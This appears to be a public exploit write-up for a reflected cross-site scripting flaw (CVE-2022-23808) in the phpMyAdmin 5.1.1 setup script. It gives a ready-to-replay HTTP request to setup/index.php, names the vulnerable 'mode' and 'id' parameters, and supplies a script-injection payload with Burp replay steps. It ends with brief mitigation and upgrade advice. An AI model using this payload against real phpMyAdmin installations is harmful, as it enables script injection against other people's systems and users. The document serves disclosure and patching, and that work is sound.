Exploit Title : phpMyAdmin 5.1.1 - XSS (Cross-site Scripting)
Exploit Author : Dipak Panchal (@th3.d1p4k)
Vendor Homepage : https://www.phpmyadmin.net
Software Link : https://www.phpmyadmin.net/files/5.1.1/
Affected Versions : phpMyAdmin versions of the 5.1 branch prior to 5.1.2 are affected.
Tested on : Windows 10 and Linux
CVE : CVE-2022-23808
Reference : https://www.phpmyadmin.net/security/PMASA-2022-2/
A series of weaknesses has been discovered that could allow an attacker to inject malicious code in to aspects of the setup script, which can allow XSS or HTML injection.
GET /phpmyadmin/setup/index.php?page=servers&mode=test&id=test HTTP/1.1
Host: 127.0.0.1:1234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie: pma_lang=en; phpMyAdmin=fs55xxxxxxx; pma_lang=en; pmaUser-1=xxxxxxxxxxxxxxxxxxxxxxxxxxx; phpMyAdmin=xxxxxxxxxxxxxxx; pmaAuth-1=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
- mode
- id
">'><script>alert(document.domain)</script>
- Capture above reuqest in burp.
- Replace/Change XSS payload with vulnerable parameters.
- Click on send and show response in browser.
- You'll get popup!
A phpMyAdmin installation with a configuration file config.inc.php will not allow access to the setup script, which in turn mitigates this attack.
Upgrade to phpMyAdmin 5.1.2 or newer or apply patch listed below.